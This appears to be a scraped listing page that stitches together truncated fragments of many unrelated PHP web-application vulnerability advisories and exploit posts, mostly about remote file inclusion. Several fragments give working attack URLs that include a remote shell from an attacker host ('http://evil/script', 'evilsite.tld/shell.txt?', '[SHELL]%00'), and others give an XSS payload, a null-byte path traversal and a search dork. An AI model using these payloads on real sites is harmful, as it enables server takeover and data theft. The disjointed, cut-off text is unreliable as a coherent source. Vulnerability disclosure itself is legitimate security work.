Next Page >>
remote file inclusion
Vulnerable Version(s): 3.5.3 and probably prior, partially 4.0 RC3
Tested Version: 3.5.3
Vendor Notification: 28 March 2012
Vendor Patch: 5 April 2012
Public Disclosure: 18 April 2012
Vulnerability Type: Remote File Inclusion, SQL Injection, Cross-Site Scripting (XSS)
CVE Reference(s): CVE-2012-1933, CVE-2012-1934, CVE-2012-1935
Solution Status: Fixed by Vendor
Risk Level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: CFAGCMS Remote File Inclusion
# Vendor: http://sourceforge.net/projects/cfagcms/
# Bug: Remote File Inclusion
# Vulnerable Version: 1
# Exploitation: Remote with browser
# Fix: N/A
Hello Bugtraq!
Vulnerability "wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion
Vulnerability" is non-working. Because mentioned RFI doesn't exist.
Cru3l.b0y, please, always check all vulnerabilities which you find. As I
already said to author of fake vulnerability in WordPress Plugin Related
Sites 2.1 (http://websecurity.com.ua/3281/), no need to litter security
space in Internet with non-working vulnerabilities.
--------------------------------------------------------------------------------
[wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR]
--------------------------------------------------------------------------------
[Golabi CMS Remote File Inclusion Vulnerability]
[+] Application Info:
[*] Name: Golabi CMS
[*] Author: R3dM0ve
[*] HomePage: http://golabicms.sourceforge.net/
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/12/16
Changelog: 2007/12/16
Summary: [HT] Remote File Inclusion
[MT] SQL Injection
[MT] SQL Injection Protection Bypass
[__] Conclusion
Legend: L - Low risk M - Medium risk
Dear,
I found Some vulnerability in DynPG CMS , This the full exploit code:
[+]Title : DynPG CMS Multiple Remote File Inclusion Vulnerability
[+]Version: 4.1.0 (Other or lower versions may also be affected)
[+]Download: http://www.dynpg.org/download_en.php
[+]License: GNU / GPL
[+]Metode : Remote File Inclusion
[+]Author: eidelweiss
========================================================
GR Board v1.8.6.1 stab (page.php?theme) Remote File Inclusion Vulnerability
========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
Hello,,
Wheatblog (wB) Remote File inclusion ..
tested on 1.1 and older versions are injected
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
Website: http://phpmychat.sourceforge.net/
Many webhosting companies are offering this version of phpMychat in their cpanel :)
----------------------------
| Remote File Inclusion: |
----------------------------
http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From
In the Script Xoops-2.0.16 are Remote File Inclusion Bugs
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Script : xoops-2.0.16-Kararli
Discovered By : F10
Contact : by_f10@hotmail.com
WebSite : http://by-f10.com
Greetz : by_emR3 , H0tturk , TaRanTuLa ,
gsy , ercu_145 ,
LupuS,m0sted,CyberGhost ... .
Advisory ID: CSA-12003
Title: Multiple vulnerabilities in OSClass
Product: OSClass
Version: 2.3.4 and probably prior
Vendor: osclass.org
Vulnerability type: SQL injection, XSS, Remote file inclusion
Vendor notification: 2012-01-12
Public disclosure: 2012-01-27
OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:
########################
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN
########################
1) Remote File Inclusion
File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
<?php
It suffers of multiple vulnerabilities.
------------------------------------------------------------------------
------------
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
------------------------------------------------------------------------
------------
# PHPkit 1.6.1 (include.php?path=) Remote File Inclusion
# Download:
# http://www.webmasternet.de/
# Bug found by Jose Luis Gngora Fernndez / JosS!
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "PHPKIT Version 1.6.1"
# Stop lammer
#############################Nyubicrew Community################################
#
# Weblogicnet (files_dir) Remote File Inclusion
#
# vendor : http://www.weblogicnet.com/
# source : http://weblogicnet.com/data/weblogicnet.tgz
#
#################################################################################
#
#
Reference: http://www.htbridge.ch/advisory/rfi_in_jaf_cms.html
Product: JAF CMS
Vendor: JAF CMS ( http://jaf-cms.sourceforge.net/ )
Vulnerable Version: 4.0 RC2
Vendor Notification: 21 October 2010
Vulnerability Type: Remote File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Code
----
#################################################
//Remote File Inclusion
//Check for strange characters in $_GET keys
//All keys with "/" or ":" are blocked, so it becomes virtually impossible to inject other pages or websites
foreach ($_GET as $get_key => $get_value) {
if ((ereg("/", $get_value)) || (ereg(":", $get_value))) {
eval("unset(\${$get_key});");
__________________
Aria-Security Team
__________________
Pluck 4.3 Remote File Inclusion
Vendor: http://www.pluck-cms.org/
/path/data/inc/theme.php
#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################
## AUTHOR: THuGM4N
## Email : Win32.exe@w.cn
## Script : Istant-Replay Forum
Script : PhpSearch
Bug : Remote File Inclusion
Author : SekoMirza
Company : http://www.hawkententerprises.org
Download : http://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet
_____________________________________________
Where :
phpsearch/utils/class_HTTPRetriever.php
_________________________
A R I A - S E C U R I T Y
_________________________
Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/
Source Code:
http://www.website.tld/geeklog/public_html/admin/install/index.php?mode="><script>alert(0)</script>dbconfig_path="><script>alert(0)</script>
Path Disclosure:
http://www.website.tld/geeklog/public_html/admin/install/index.php?mode='&dbconfig_path='
Remote File Inclusion:
http://www.website.tld/geeklog/public_html/admin/install/index.php?mode='&dbconfig_path=http://www.evilsite.tld/shell.txt?
-:: Solution ::-
I didn't bother to find one, sorry.
# Script : Agares PhpAutoVideo 2.21 and below
# Download : http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# BUG : (XSS/RFI) Multiple Remote Vulnerabilities
## Remote File Inclusion
[+] Vulnerable CODE :
~~~~~~~~~ /theme/phpAutoVideo/LightTwoOh/sidebar.php ~~~~~~~~~~~~~~~~~
<?PHP include($loadpage); ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto
A remote attacker can gain access to your website throug a Remote shell inclusion.
PoC available:
http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
database that also allows JavaScript to be used in queries:
http://www.mongodb.org/
Today, the most common source of PHP security flaws is unvalidated
input. They give rise to SQL Injection, XSS, Remote Command Execution,
Local and Remote File Inclusion, etc (known as the PHP Top 5
https://www.owasp.org/index.php/PHP_Top_5). With the rising adoption of
server-side JavaScript, we can expect server-side JS injection
vulnerabilities caused by unvalidated user input to become prevalent,
and the techniques for exploiting them, commonplace. At Syhunt, we
already started our own collection of techniques for detecting
++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Code
+ log.inc.php
?>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
The attacker can control the central part of the included filename,
since there is a fixed prefix RFI (Remote File Inclusion) cannot be
performed (since it would require a protocol/uri handler to be
provided to PHP plus the relatively new php.ini directives
"allow_url_fopen" and "allow_url_include" on "On").
Commonly this can be exploited with a path traversal attack trying to
#Local File Inclusion:
[chicomas]/install/?lang=../FILE%00
[chikomas]/install/?operation=../FILE%00
#Remote File Inclusion
[chicomas]/install/?lang=[SHELL]%00
Author: AzzCoder [azzcoder@hotmail.com]
Product: http://www.xrms.org/
Product Type: CRM
Thanks: coresecurity.com
Remote File Inclusion
File: activities/workflow-activities.php
Variable: $include_directory
Required register_globals: Yes
XSS
Next Page>>
|
